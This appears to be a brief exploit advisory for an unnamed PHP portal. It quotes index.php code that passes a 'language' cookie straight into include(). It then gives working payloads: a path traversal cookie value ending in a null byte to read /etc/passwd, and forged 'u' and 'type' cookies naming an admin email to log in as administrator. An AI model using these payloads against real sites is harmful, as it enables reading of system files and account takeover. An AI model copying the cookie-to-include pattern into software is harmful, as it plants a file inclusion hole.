Vulnerable code is in index.php & some 0ther pageZ
in line 27-35 :
---------------cut here --------------->
if($_COOKIE["language"]) {
$llang = $_COOKIE["language"];
}
else
{
$l_array = explode("-",$lang_array[0]);
$llang = $l_array[0];
setcookie("language",$llang,time()+1209600,"","","");
}
include("lang/".$llang.".php");
---------------cut here ---------------<
==============================================================
Ex:
open cookies and find portal cookies,chang this in first line(use opera for changing,is too easy whit opera!==>tools==>advance==>cookies):
---------------cut here --------------->
language
en
to
language
…/…/…/…/…/…/…/…/…/etc/passwd%00
---------------cut here ---------------<
in you found admin's email for login can chang cookeis some thing like this:
>---------------cut here ---------------
u
snake%40lolo.com
type
admin
---------------cut here ---------------<
and login Admin!